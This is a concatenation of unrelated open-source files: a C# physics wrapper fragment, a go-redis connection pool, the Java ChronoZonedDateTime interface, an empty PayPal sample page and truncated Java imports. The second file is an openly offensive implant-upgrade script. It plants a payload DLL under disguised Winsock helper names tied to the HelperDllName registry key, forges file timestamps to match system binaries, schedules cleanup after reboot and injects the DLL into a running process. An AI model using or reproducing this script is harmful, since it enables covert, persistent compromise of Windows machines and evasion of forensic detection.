btVoronoiSimplexSolver_getCachedV(Native, out value);
return value;
}
set => btVoronoiSimplexSolver_setCachedV(Native, ref value);
}
public bool CachedValidClosest
{
get => btVoronoiSimplexSolver_getCachedValidClosest(Native);
set => btVoronoiSimplexSolver_setCachedValidClosest(Native, value);
}
public double EqualVertexThreshold
{
get => btVoronoiSimplexSolver_getEqualVertexThreshold(Native);
set => btVoronoiSimplexSolver_setEqualVertexThreshold(Native, value);
}
public Vector3 LastW
{
get
{
Vector3 value;
btVoronoiSimplexSolver_getLastW(Native, out value);
return value;
}
set => btVoronoiSimplexSolver_setLastW(Native, ref value);
}
public bool NeedsUpdate
{
get => btVoronoiSimplexSolver_getNeedsUpdate(Native);
set => btVoronoiSimplexSolver_setNeedsUpdate(Native, value);
}
public int NumVertices
{
get => btVoronoiSimplexSolver_getNumVertices(Native);
set => btVoronoiSimplexSolver_setNumVertices(Native, value);
}
/*
public Vector3[] SimplexPointsP
{
get { return btVoronoiSimplexSolver_getSimplexPointsP(Native); }
}
public Vector3[] SimplexPointsQ
{
get { return btVoronoiSimplexSolver_getSimplexPointsQ(Native); }
}
public Vector3[] SimplexVectorW
{
get { return btVoronoiSimplexSolver_getSimplexVectorW(Native); }
}
*/
public void Dispose()
{
Dispose(true);
GC.SuppressFinalize(this);
}
protected virtual void Dispose(bool disposing)
{
if (Native != IntPtr.Zero)
{
if (!_preventDelete)
{
btVoronoiSimplexSolver_delete(Native);
}
Native = IntPtr.Zero;
}
}
~VoronoiSimplexSolver()
{
Dispose(false);
}
}
}
| {
"pile_set_name": "Github"
} |
@include "_File.dsi";
@include "_Paths.dsi";
@include "_Processes.dsi";
@include "_Versions.dsi";
@include "windows/_RegistryIncludes.dsi";
@echo off;
@disablewow64 on;
if ($argc != 3)
{
echo("* Invalid parmeters", ERROR);
echo();
echo("Usage: $argv[0] <localFile> <procName>");
return false;
}
string $localFile = $argv[1];
string $procName = $argv[2];
string $arch;
_GetArch($arch);
string $regKey = "SYSTEM\\CurrentControlSet\\Services\\Tcpip\\Parameters\\Winsock";
string $regKeyValue = "HelperDllName";
string $defaultPath = "\%\%SystemRoot\%\%\\System32";
# get install name and path
string $payloadPath = $defaultPath;
string $payloadName = "wshencrp.dll";
string $payloadLoadPath = $defaultPath;
string $payloadLoadName = "wshencrt.dll";
string $payloadDeletePath = $defaultPath;
string $payloadDeleteName = "wshencrr.dll";
if (!GetInput("PC DLL install path", $payloadPath, $payloadPath) ||
!GetInput("PC DLL install name", $payloadName, $payloadName) ||
!GetInput("PC DLL temporary (to load) path", $payloadLoadPath, $payloadLoadPath) ||
!GetInput("PC DLL temporary (to load) name", $payloadLoadName, $payloadLoadName) ||
!GetInput("PC DLL temporary (to delete) path", $payloadDeletePath, $payloadDeletePath) ||
!GetInput("PC DLL temporary (to delete) name", $payloadDeleteName, $payloadDeleteName))
{
echo("* Failed to get PC names and paths", ERROR);
return false;
}
# get the system path
string $sysPath;
if (!_GetSystemPath($sysPath))
{
echo("* Failed to get system path", ERROR);
return false;
}
# get the HelperDllName value
string $origKeyValue;
if (!_GetRegistryValue("L",
$regKey,
$regKeyValue,
$origKeyValue) || !defined($origKeyValue))
{
$origKeyValue = "";
}
if ($origKeyValue != "$payloadPath\\$payloadName")
{
echo("* Failed to find $payloadPath\\$payloadName in $regKeyValue key", ERROR);
return false;
}
# get the process id for injection
int $id;
if (prompt("Do you want to perform injection (for instant-grat)? Answer NO if using the same host process as old version!", false))
{
if (StrLen($procName) > 0)
{
if (!_FindProcessOnList($procName, $id) || !defined($id))
{
echo("* Failed to find $procName", ERROR);
}
}
# make sure the user wants to keep going if we don't have a process
if (!defined($id))
{
echo("No process for injection", ERROR);
if (!prompt("Continue?"))
{
return false;
}
}
}
string $usePath = $payloadPath;
if ($usePath == $defaultPath)
{
$usePath = $sysPath;
}
string $useLoadPath = $payloadLoadPath;
if ($useLoadPath == $defaultPath)
{
$useLoadPath = $sysPath;
}
string $useDeletePath = $payloadDeletePath;
if ($useDeletePath == $defaultPath)
{
$useDeletePath = $sysPath;
}
# upload the new file
echo "Uploading new PC";
if (!`put "$localFile" -name "$useLoadPath\\$payloadLoadName" -permanent`)
{
echo(" FAILED", ERROR);
pause;
return false;
}
echo(" FINISHED", GOOD);
# move the old file
echo "Moving old PC";
if (!`move "$usePath\\$payloadName" "$useDeletePath\\$payloadDeleteName"`)
{
echo(" FAILED", ERROR);
echo "Performing recovery";
if (!`delete -file "$useLoadPath\\$payloadLoadName"`)
{
echo(" FAILED", ERROR);
}
else
{
echo(" RECOVERED", GOOD);
}
pause;
return false;
}
echo(" FINISHED", GOOD);
# copy the new file to it's final location
echo "Copying new PC to permanent location";
if (!`copy "$useLoadPath\\$payloadLoadName" "$usePath\\$payloadName"`)
{
echo(" FAILED", ERROR);
echo "Performing recovery";
if (!`move "$useDeletePath\\$payloadDeleteName" "$usePath\\$payloadName"` ||
!`delete -file "$useLoadPath\\$payloadLoadName"`)
{
echo(" FAILED", ERROR);
}
else
{
echo(" RECOVERED", GOOD);
}
pause;
return false;
}
echo(" FINISHED", GOOD);
string $matchName = "user.exe";
if ($arch == "x64")
{
# alternative match name for x64.
$matchName = "winlogon.exe";
echo "Copying SysWOW64 helper DLL";
string $homonymousDll;
$homonymousDll = "$sysPath\\$payloadName";
RegExSub("system32","SysWOW64",$homonymousDll);
# First see if we're upgrading from a PC install that was aware of this bug:
if(_FileExists($homonymousDll))
{
echo(" DONE ALREADY (OK)", GOOD);
}
else
{
# In the normal case, the "orig" file will exist, use that (would be a copy of wshtcpip if PC installed).
# Otherwise, fall back to wshtcpip.dll (someone else broke it, we'll fix it anyway).
string $origSW64Dll;
$origSW64Dll = $origKeyValue;
@regex-global on;
RegExSub("^.*\\\\", "", $origSW64Dll);
@regex-global off;
$origSW64Dll = "$sysPath\\$origSW64Dll";
RegExSub("system32","SysWOW64",$origSW64Dll);
if(!_FileExists($origSW64Dll))
{
# Upgrading from 2.2 and prior, this is actually the expected path, no need to warn here.
$origSW64Dll = "$sysPath\\wshtcpip.dll";
RegExSub("system32","SysWOW64",$origSW64Dll);
}
if(!_FileExists($origSW64Dll))
{
echo(" FAILED (no $origSW64Dll)", ERROR);
pause;
# continue...
}
else
{
if(!`copy $origSW64Dll $homonymousDll`)
{
echo(" FAILED (could not copy source)", ERROR);
pause;
# continue...
}
else
{
echo(" FINISHED", GOOD);
echo "Matching SysWOW64 filetimes";
if (!`matchfiletimes -src "$origSW64Dll" -dst "$homonymousDll"`)
{
echo(" FAILED (times not matched)", ERROR);
pause;
# continue...
}
else
{
echo(" FINISHED", GOOD);
}
}
}
}
}
echo "Matching filetimes with $matchName";
if (!`matchfiletimes -src "$sysPath\\$matchName" -dst "$usePath\\$payloadName"` ||
!`matchfiletimes -src "$sysPath\\$matchName" -dst "$useLoadPath\\$payloadLoadName"` ||
!`matchfiletimes -src "$sysPath\\$matchName" -dst "$useDeletePath\\$payloadDeleteName"`)
{
echo(" FAILED", WARNING);
pause;
# continue...
}
else
{
echo(" FINISHED", GOOD);
}
# mark the temp files for deletion
`delete -file "$useLoadPath\\$payloadLoadName" -afterreboot`;
`delete -file "$useDeletePath\\$payloadDeleteName" -afterreboot`;
if (defined($id))
{
# inject the DLL
echo "Injecting DLL";
if (!`injectdll -library $payloadLoadName -id $id`)
{
echo(" FAILED", ERROR);
}
else
{
echo(" INJECTED", GOOD);
}
}
echo "Upgrade Finished";
echo "$regKeyValue : '$origKeyValue'";
pause;
return true;
| {
"pile_set_name": "Github"
} |
package pool
import (
"net"
"sync/atomic"
"time"
"github.com/go-redis/redis/internal/proto"
)
var noDeadline = time.Time{}
type Conn struct {
netConn net.Conn
Rd *proto.Reader
Wb *proto.WriteBuffer
Inited bool
usedAt atomic.Value
}
func NewConn(netConn net.Conn) *Conn {
cn := &Conn{
netConn: netConn,
Wb: proto.NewWriteBuffer(),
}
cn.Rd = proto.NewReader(cn.netConn)
cn.SetUsedAt(time.Now())
return cn
}
func (cn *Conn) UsedAt() time.Time {
return cn.usedAt.Load().(time.Time)
}
func (cn *Conn) SetUsedAt(tm time.Time) {
cn.usedAt.Store(tm)
}
func (cn *Conn) SetNetConn(netConn net.Conn) {
cn.netConn = netConn
cn.Rd.Reset(netConn)
}
func (cn *Conn) IsStale(timeout time.Duration) bool {
return timeout > 0 && time.Since(cn.UsedAt()) > timeout
}
func (cn *Conn) SetReadTimeout(timeout time.Duration) error {
now := time.Now()
cn.SetUsedAt(now)
if timeout > 0 {
return cn.netConn.SetReadDeadline(now.Add(timeout))
}
return cn.netConn.SetReadDeadline(noDeadline)
}
func (cn *Conn) SetWriteTimeout(timeout time.Duration) error {
now := time.Now()
cn.SetUsedAt(now)
if timeout > 0 {
return cn.netConn.SetWriteDeadline(now.Add(timeout))
}
return cn.netConn.SetWriteDeadline(noDeadline)
}
func (cn *Conn) Write(b []byte) (int, error) {
return cn.netConn.Write(b)
}
func (cn *Conn) RemoteAddr() net.Addr {
return cn.netConn.RemoteAddr()
}
func (cn *Conn) Close() error {
return cn.netConn.Close()
}
| {
"pile_set_name": "Github"
} |
/*
* Copyright (c) 2012, 2015, Oracle and/or its affiliates. All rights reserved.
* DO NOT ALTER OR REMOVE COPYRIGHT NOTICES OR THIS FILE HEADER.
*
* This code is free software; you can redistribute it and/or modify it
* under the terms of the GNU General Public License version 2 only, as
* published by the Free Software Foundation. Oracle designates this
* particular file as subject to the "Classpath" exception as provided
* by Oracle in the LICENSE file that accompanied this code.
*
* This code is distributed in the hope that it will be useful, but WITHOUT
* ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
* FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License
* version 2 for more details (a copy is included in the LICENSE file that
* accompanied this code).
*
* You should have received a copy of the GNU General Public License version
* 2 along with this work; if not, write to the Free Software Foundation,
* Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
*
* Please contact Oracle, 500 Oracle Parkway, Redwood Shores, CA 94065 USA
* or visit www.oracle.com if you need additional information or have any
* questions.
*/
/*
* This file is available under and governed by the GNU General Public
* License version 2 only, as published by the Free Software Foundation.
* However, the following notice accompanied the original version of this
* file:
*
* Copyright (c) 2007-2012, Stephen Colebourne & Michael Nascimento Santos
*
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions are met:
*
* * Redistributions of source code must retain the above copyright notice,
* this list of conditions and the following disclaimer.
*
* * Redistributions in binary form must reproduce the above copyright notice,
* this list of conditions and the following disclaimer in the documentation
* and/or other materials provided with the distribution.
*
* * Neither the name of JSR-310 nor the names of its contributors
* may be used to endorse or promote products derived from this software
* without specific prior written permission.
*
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
* "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
* LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
* A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
* CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
* EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
* PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
* PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
* LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
* NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
* SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*/
package java.time.chrono;
import static java.time.temporal.ChronoField.INSTANT_SECONDS;
import static java.time.temporal.ChronoField.OFFSET_SECONDS;
import static java.time.temporal.ChronoUnit.FOREVER;
import static java.time.temporal.ChronoUnit.NANOS;
import java.time.DateTimeException;
import java.time.Instant;
import java.time.LocalTime;
import java.time.ZoneId;
import java.time.ZoneOffset;
import java.time.ZonedDateTime;
import java.time.format.DateTimeFormatter;
import java.time.temporal.ChronoField;
import java.time.temporal.ChronoUnit;
import java.time.temporal.Temporal;
import java.time.temporal.TemporalAccessor;
import java.time.temporal.TemporalAdjuster;
import java.time.temporal.TemporalAmount;
import java.time.temporal.TemporalField;
import java.time.temporal.TemporalQueries;
import java.time.temporal.TemporalQuery;
import java.time.temporal.TemporalUnit;
import java.time.temporal.UnsupportedTemporalTypeException;
import java.time.temporal.ValueRange;
import java.util.Comparator;
import java.util.Objects;
/**
* A date-time with a time-zone in an arbitrary chronology,
* intended for advanced globalization use cases.
* <p>
* <b>Most applications should declare method signatures, fields and variables
* as {@link ZonedDateTime}, not this interface.</b>
* <p>
* A {@code ChronoZonedDateTime} is the abstract representation of an offset date-time
* where the {@code Chronology chronology}, or calendar system, is pluggable.
* The date-time is defined in terms of fields expressed by {@link TemporalField},
* where most common implementations are defined in {@link ChronoField}.
* The chronology defines how the calendar system operates and the meaning of
* the standard fields.
*
* <h3>When to use this interface</h3>
* The design of the API encourages the use of {@code ZonedDateTime} rather than this
* interface, even in the case where the application needs to deal with multiple
* calendar systems. The rationale for this is explored in detail in {@link ChronoLocalDate}.
* <p>
* Ensure that the discussion in {@code ChronoLocalDate} has been read and understood
* before using this interface.
*
* @implSpec
* This interface must be implemented with care to ensure other classes operate correctly.
* All implementations that can be instantiated must be final, immutable and thread-safe.
* Subclasses should be Serializable wherever possible.
*
* @param <D> the concrete type for the date of this date-time
* @since 1.8
*/
public interface ChronoZonedDateTime<D extends ChronoLocalDate>
extends Temporal, Comparable<ChronoZonedDateTime<?>> {
/**
* Gets a comparator that compares {@code ChronoZonedDateTime} in
* time-line order ignoring the chronology.
* <p>
* This comparator differs from the comparison in {@link #compareTo} in that it
* only compares the underlying instant and not the chronology.
* This allows dates in different calendar systems to be compared based
* on the position of the date-time on the instant time-line.
* The underlying comparison is equivalent to comparing the epoch-second and nano-of-second.
*
* @return a comparator that compares in time-line order ignoring the chronology
* @see #isAfter
* @see #isBefore
* @see #isEqual
*/
static Comparator<ChronoZonedDateTime<?>> timeLineOrder() {
return AbstractChronology.INSTANT_ORDER;
}
//-----------------------------------------------------------------------
/**
* Obtains an instance of {@code ChronoZonedDateTime} from a temporal object.
* <p>
* This creates a zoned date-time based on the specified temporal.
* A {@code TemporalAccessor} represents an arbitrary set of date and time information,
* which this factory converts to an instance of {@code ChronoZonedDateTime}.
* <p>
* The conversion extracts and combines the chronology, date, time and zone
* from the temporal object. The behavior is equivalent to using
* {@link Chronology#zonedDateTime(TemporalAccessor)} with the extracted chronology.
* Implementations are permitted to perform optimizations such as accessing
* those fields that are equivalent to the relevant objects.
* <p>
* This method matches the signature of the functional interface {@link TemporalQuery}
* allowing it to be used as a query via method reference, {@code ChronoZonedDateTime::from}.
*
* @param temporal the temporal object to convert, not null
* @return the date-time, not null
* @throws DateTimeException if unable to convert to a {@code ChronoZonedDateTime}
* @see Chronology#zonedDateTime(TemporalAccessor)
*/
static ChronoZonedDateTime<?> from(TemporalAccessor temporal) {
if (temporal instanceof ChronoZonedDateTime) {
return (ChronoZonedDateTime<?>) temporal;
}
Objects.requireNonNull(temporal, "temporal");
Chronology chrono = temporal.query(TemporalQueries.chronology());
if (chrono == null) {
throw new DateTimeException("Unable to obtain ChronoZonedDateTime from TemporalAccessor: " + temporal.getClass());
}
return chrono.zonedDateTime(temporal);
}
//-----------------------------------------------------------------------
@Override
default ValueRange range(TemporalField field) {
if (field instanceof ChronoField) {
if (field == INSTANT_SECONDS || field == OFFSET_SECONDS) {
return field.range();
}
return toLocalDateTime().range(field);
}
return field.rangeRefinedBy(this);
}
@Override
default int get(TemporalField field) {
if (field instanceof ChronoField) {
switch ((ChronoField) field) {
case INSTANT_SECONDS:
throw new UnsupportedTemporalTypeException("Invalid field 'InstantSeconds' for get() method, use getLong() instead");
case OFFSET_SECONDS:
return getOffset().getTotalSeconds();
}
return toLocalDateTime().get(field);
}
return Temporal.super.get(field);
}
@Override
default long getLong(TemporalField field) {
if (field instanceof ChronoField) {
switch ((ChronoField) field) {
case INSTANT_SECONDS: return toEpochSecond();
case OFFSET_SECONDS: return getOffset().getTotalSeconds();
}
return toLocalDateTime().getLong(field);
}
return field.getFrom(this);
}
/**
* Gets the local date part of this date-time.
* <p>
* This returns a local date with the same year, month and day
* as this date-time.
*
* @return the date part of this date-time, not null
*/
default D toLocalDate() {
return toLocalDateTime().toLocalDate();
}
/**
* Gets the local time part of this date-time.
* <p>
* This returns a local time with the same hour, minute, second and
* nanosecond as this date-time.
*
* @return the time part of this date-time, not null
*/
default LocalTime toLocalTime() {
return toLocalDateTime().toLocalTime();
}
/**
* Gets the local date-time part of this date-time.
* <p>
* This returns a local date with the same year, month and day
* as this date-time.
*
* @return the local date-time part of this date-time, not null
*/
ChronoLocalDateTime<D> toLocalDateTime();
/**
* Gets the chronology of this date-time.
* <p>
* The {@code Chronology} represents the calendar system in use.
* The era and other fields in {@link ChronoField} are defined by the chronology.
*
* @return the chronology, not null
*/
default Chronology getChronology() {
return toLocalDate().getChronology();
}
/**
* Gets the zone offset, such as '+01:00'.
* <p>
* This is the offset of the local date-time from UTC/Greenwich.
*
* @return the zone offset, not null
*/
ZoneOffset getOffset();
/**
* Gets the zone ID, such as 'Europe/Paris'.
* <p>
* This returns the stored time-zone id used to determine the time-zone rules.
*
* @return the zone ID, not null
*/
ZoneId getZone();
//-----------------------------------------------------------------------
/**
* Returns a copy of this date-time changing the zone offset to the
* earlier of the two valid offsets at a local time-line overlap.
* <p>
* This method only has any effect when the local time-line overlaps, such as
* at an autumn daylight savings cutover. In this scenario, there are two
* valid offsets for the local date-time. Calling this method will return
* a zoned date-time with the earlier of the two selected.
* <p>
* If this method is called when it is not an overlap, {@code this}
* is returned.
* <p>
* This instance is immutable and unaffected by this method call.
*
* @return a {@code ChronoZonedDateTime} based on this date-time with the earlier offset, not null
* @throws DateTimeException if no rules can be found for the zone
* @throws DateTimeException if no rules are valid for this date-time
*/
ChronoZonedDateTime<D> withEarlierOffsetAtOverlap();
/**
* Returns a copy of this date-time changing the zone offset to the
* later of the two valid offsets at a local time-line overlap.
* <p>
* This method only has any effect when the local time-line overlaps, such as
* at an autumn daylight savings cutover. In this scenario, there are two
* valid offsets for the local date-time. Calling this method will return
* a zoned date-time with the later of the two selected.
* <p>
* If this method is called when it is not an overlap, {@code this}
* is returned.
* <p>
* This instance is immutable and unaffected by this method call.
*
* @return a {@code ChronoZonedDateTime} based on this date-time with the later offset, not null
* @throws DateTimeException if no rules can be found for the zone
* @throws DateTimeException if no rules are valid for this date-time
*/
ChronoZonedDateTime<D> withLaterOffsetAtOverlap();
/**
* Returns a copy of this date-time with a different time-zone,
* retaining the local date-time if possible.
* <p>
* This method changes the time-zone and retains the local date-time.
* The local date-time is only changed if it is invalid for the new zone.
* <p>
* To change the zone and adjust the local date-time,
* use {@link #withZoneSameInstant(ZoneId)}.
* <p>
* This instance is immutable and unaffected by this method call.
*
* @param zone the time-zone to change to, not null
* @return a {@code ChronoZonedDateTime} based on this date-time with the requested zone, not null
*/
ChronoZonedDateTime<D> withZoneSameLocal(ZoneId zone);
/**
* Returns a copy of this date-time with a different time-zone,
* retaining the instant.
* <p>
* This method changes the time-zone and retains the instant.
* This normally results in a change to the local date-time.
* <p>
* This method is based on retaining the same instant, thus gaps and overlaps
* in the local time-line have no effect on the result.
* <p>
* To change the offset while keeping the local time,
* use {@link #withZoneSameLocal(ZoneId)}.
*
* @param zone the time-zone to change to, not null
* @return a {@code ChronoZonedDateTime} based on this date-time with the requested zone, not null
* @throws DateTimeException if the result exceeds the supported date range
*/
ChronoZonedDateTime<D> withZoneSameInstant(ZoneId zone);
/**
* Checks if the specified field is supported.
* <p>
* This checks if the specified field can be queried on this date-time.
* If false, then calling the {@link #range(TemporalField) range},
* {@link #get(TemporalField) get} and {@link #with(TemporalField, long)}
* methods will throw an exception.
* <p>
* The set of supported fields is defined by the chronology and normally includes
* all {@code ChronoField} fields.
* <p>
* If the field is not a {@code ChronoField}, then the result of this method
* is obtained by invoking {@code TemporalField.isSupportedBy(TemporalAccessor)}
* passing {@code this} as the argument.
* Whether the field is supported is determined by the field.
*
* @param field the field to check, null returns false
* @return true if the field can be queried, false if not
*/
@Override
boolean isSupported(TemporalField field);
/**
* Checks if the specified unit is supported.
* <p>
* This checks if the specified unit can be added to or subtracted from this date-time.
* If false, then calling the {@link #plus(long, TemporalUnit)} and
* {@link #minus(long, TemporalUnit) minus} methods will throw an exception.
* <p>
* The set of supported units is defined by the chronology and normally includes
* all {@code ChronoUnit} units except {@code FOREVER}.
* <p>
* If the unit is not a {@code ChronoUnit}, then the result of this method
* is obtained by invoking {@code TemporalUnit.isSupportedBy(Temporal)}
* passing {@code this} as the argument.
* Whether the unit is supported is determined by the unit.
*
* @param unit the unit to check, null returns false
* @return true if the unit can be added/subtracted, false if not
*/
@Override
default boolean isSupported(TemporalUnit unit) {
if (unit instanceof ChronoUnit) {
return unit != FOREVER;
}
return unit != null && unit.isSupportedBy(this);
}
//-----------------------------------------------------------------------
// override for covariant return type
/**
* {@inheritDoc}
* @throws DateTimeException {@inheritDoc}
* @throws ArithmeticException {@inheritDoc}
*/
@Override
default ChronoZonedDateTime<D> with(TemporalAdjuster adjuster) {
return ChronoZonedDateTimeImpl.ensureValid(getChronology(), Temporal.super.with(adjuster));
}
/**
* {@inheritDoc}
* @throws DateTimeException {@inheritDoc}
* @throws ArithmeticException {@inheritDoc}
*/
@Override
ChronoZonedDateTime<D> with(TemporalField field, long newValue);
/**
* {@inheritDoc}
* @throws DateTimeException {@inheritDoc}
* @throws ArithmeticException {@inheritDoc}
*/
@Override
default ChronoZonedDateTime<D> plus(TemporalAmount amount) {
return ChronoZonedDateTimeImpl.ensureValid(getChronology(), Temporal.super.plus(amount));
}
/**
* {@inheritDoc}
* @throws DateTimeException {@inheritDoc}
* @throws ArithmeticException {@inheritDoc}
*/
@Override
ChronoZonedDateTime<D> plus(long amountToAdd, TemporalUnit unit);
/**
* {@inheritDoc}
* @throws DateTimeException {@inheritDoc}
* @throws ArithmeticException {@inheritDoc}
*/
@Override
default ChronoZonedDateTime<D> minus(TemporalAmount amount) {
return ChronoZonedDateTimeImpl.ensureValid(getChronology(), Temporal.super.minus(amount));
}
/**
* {@inheritDoc}
* @throws DateTimeException {@inheritDoc}
* @throws ArithmeticException {@inheritDoc}
*/
@Override
default ChronoZonedDateTime<D> minus(long amountToSubtract, TemporalUnit unit) {
return ChronoZonedDateTimeImpl.ensureValid(getChronology(), Temporal.super.minus(amountToSubtract, unit));
}
//-----------------------------------------------------------------------
/**
* Queries this date-time using the specified query.
* <p>
* This queries this date-time using the specified query strategy object.
* The {@code TemporalQuery} object defines the logic to be used to
* obtain the result. Read the documentation of the query to understand
* what the result of this method will be.
* <p>
* The result of this method is obtained by invoking the
* {@link TemporalQuery#queryFrom(TemporalAccessor)} method on the
* specified query passing {@code this} as the argument.
*
* @param <R> the type of the result
* @param query the query to invoke, not null
* @return the query result, null may be returned (defined by the query)
* @throws DateTimeException if unable to query (defined by the query)
* @throws ArithmeticException if numeric overflow occurs (defined by the query)
*/
@SuppressWarnings("unchecked")
@Override
default <R> R query(TemporalQuery<R> query) {
if (query == TemporalQueries.zone() || query == TemporalQueries.zoneId()) {
return (R) getZone();
} else if (query == TemporalQueries.offset()) {
return (R) getOffset();
} else if (query == TemporalQueries.localTime()) {
return (R) toLocalTime();
} else if (query == TemporalQueries.chronology()) {
return (R) getChronology();
} else if (query == TemporalQueries.precision()) {
return (R) NANOS;
}
// inline TemporalAccessor.super.query(query) as an optimization
// non-JDK classes are not permitted to make this optimization
return query.queryFrom(this);
}
/**
* Formats this date-time using the specified formatter.
* <p>
* This date-time will be passed to the formatter to produce a string.
* <p>
* The default implementation must behave as follows:
* <pre>
* return formatter.format(this);
* </pre>
*
* @param formatter the formatter to use, not null
* @return the formatted date-time string, not null
* @throws DateTimeException if an error occurs during printing
*/
default String format(DateTimeFormatter formatter) {
Objects.requireNonNull(formatter, "formatter");
return formatter.format(this);
}
//-----------------------------------------------------------------------
/**
* Converts this date-time to an {@code Instant}.
* <p>
* This returns an {@code Instant} representing the same point on the
* time-line as this date-time. The calculation combines the
* {@linkplain #toLocalDateTime() local date-time} and
* {@linkplain #getOffset() offset}.
*
* @return an {@code Instant} representing the same instant, not null
*/
default Instant toInstant() {
return Instant.ofEpochSecond(toEpochSecond(), toLocalTime().getNano());
}
/**
* Converts this date-time to the number of seconds from the epoch
* of 1970-01-01T00:00:00Z.
* <p>
* This uses the {@linkplain #toLocalDateTime() local date-time} and
* {@linkplain #getOffset() offset} to calculate the epoch-second value,
* which is the number of elapsed seconds from 1970-01-01T00:00:00Z.
* Instants on the time-line after the epoch are positive, earlier are negative.
*
* @return the number of seconds from the epoch of 1970-01-01T00:00:00Z
*/
default long toEpochSecond() {
long epochDay = toLocalDate().toEpochDay();
long secs = epochDay * 86400 + toLocalTime().toSecondOfDay();
secs -= getOffset().getTotalSeconds();
return secs;
}
//-----------------------------------------------------------------------
/**
* Compares this date-time to another date-time, including the chronology.
* <p>
* The comparison is based first on the instant, then on the local date-time,
* then on the zone ID, then on the chronology.
* It is "consistent with equals", as defined by {@link Comparable}.
* <p>
* If all the date-time objects being compared are in the same chronology, then the
* additional chronology stage is not required.
* <p>
* This default implementation performs the comparison defined above.
*
* @param other the other date-time to compare to, not null
* @return the comparator value, negative if less, positive if greater
*/
@Override
default int compareTo(ChronoZonedDateTime<?> other) {
int cmp = Long.compare(toEpochSecond(), other.toEpochSecond());
if (cmp == 0) {
cmp = toLocalTime().getNano() - other.toLocalTime().getNano();
if (cmp == 0) {
cmp = toLocalDateTime().compareTo(other.toLocalDateTime());
if (cmp == 0) {
cmp = getZone().getId().compareTo(other.getZone().getId());
if (cmp == 0) {
cmp = getChronology().compareTo(other.getChronology());
}
}
}
}
return cmp;
}
/**
* Checks if the instant of this date-time is before that of the specified date-time.
* <p>
* This method differs from the comparison in {@link #compareTo} in that it
* only compares the instant of the date-time. This is equivalent to using
* {@code dateTime1.toInstant().isBefore(dateTime2.toInstant());}.
* <p>
* This default implementation performs the comparison based on the epoch-second
* and nano-of-second.
*
* @param other the other date-time to compare to, not null
* @return true if this point is before the specified date-time
*/
default boolean isBefore(ChronoZonedDateTime<?> other) {
long thisEpochSec = toEpochSecond();
long otherEpochSec = other.toEpochSecond();
return thisEpochSec < otherEpochSec ||
(thisEpochSec == otherEpochSec && toLocalTime().getNano() < other.toLocalTime().getNano());
}
/**
* Checks if the instant of this date-time is after that of the specified date-time.
* <p>
* This method differs from the comparison in {@link #compareTo} in that it
* only compares the instant of the date-time. This is equivalent to using
* {@code dateTime1.toInstant().isAfter(dateTime2.toInstant());}.
* <p>
* This default implementation performs the comparison based on the epoch-second
* and nano-of-second.
*
* @param other the other date-time to compare to, not null
* @return true if this is after the specified date-time
*/
default boolean isAfter(ChronoZonedDateTime<?> other) {
long thisEpochSec = toEpochSecond();
long otherEpochSec = other.toEpochSecond();
return thisEpochSec > otherEpochSec ||
(thisEpochSec == otherEpochSec && toLocalTime().getNano() > other.toLocalTime().getNano());
}
/**
* Checks if the instant of this date-time is equal to that of the specified date-time.
* <p>
* This method differs from the comparison in {@link #compareTo} and {@link #equals}
* in that it only compares the instant of the date-time. This is equivalent to using
* {@code dateTime1.toInstant().equals(dateTime2.toInstant());}.
* <p>
* This default implementation performs the comparison based on the epoch-second
* and nano-of-second.
*
* @param other the other date-time to compare to, not null
* @return true if the instant equals the instant of the specified date-time
*/
default boolean isEqual(ChronoZonedDateTime<?> other) {
return toEpochSecond() == other.toEpochSecond() &&
toLocalTime().getNano() == other.toLocalTime().getNano();
}
//-----------------------------------------------------------------------
/**
* Checks if this date-time is equal to another date-time.
* <p>
* The comparison is based on the offset date-time and the zone.
* To compare for the same instant on the time-line, use {@link #compareTo}.
* Only objects of type {@code ChronoZonedDateTime} are compared, other types return false.
*
* @param obj the object to check, null returns false
* @return true if this is equal to the other date-time
*/
@Override
boolean equals(Object obj);
/**
* A hash code for this date-time.
*
* @return a suitable hash code
*/
@Override
int hashCode();
//-----------------------------------------------------------------------
/**
* Outputs this date-time as a {@code String}.
* <p>
* The output will include the full zoned date-time.
*
* @return a string representation of this date-time, not null
*/
@Override
String toString();
}
| {
"pile_set_name": "Github"
} |
<%@ Page Language="C#" AutoEventWireup="true" CodeBehind="BillingPlanGet.aspx.cs" Inherits="PayPal.Sample.BillingPlanGet" %>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head runat="server">
<link href="assets/style.css" rel="stylesheet" type="text/css" />
<title>Untitled Page</title>
</head>
<body>
<form id="form1" runat="server">
<div>
</div>
</form>
</body>
</html>
| {
"pile_set_name": "Github"
} |
package cyclops.companion.reactor;
import com.oath.cyclops.react.Status;
import com.oath.cyclops.types.Value;
import cyclops.companion.Futures;
import cyclops.control.Either;
import cyclops.control.Eval;
import cyclops.control.Future;
import cyclops.control.Maybe;
import cyclops.function.Function3;
import cyclops.function.Function4;
import cyclops.instances.control.FutureInstances;
import cyclops.reactive.ReactiveSeq;
import cyclops.reactive.collections.mutable.ListX;
import io.kindedj.Hk;
import lombok.experimental.UtilityClass;
import org.reactivestreams.Publisher;
import reactor.core.publisher.Flux;
import reactor.core.publisher.Mono;
import java.util.Iterator;
import java.util.concurrent.CompletableFuture;
import java.util.function.BiFunction;
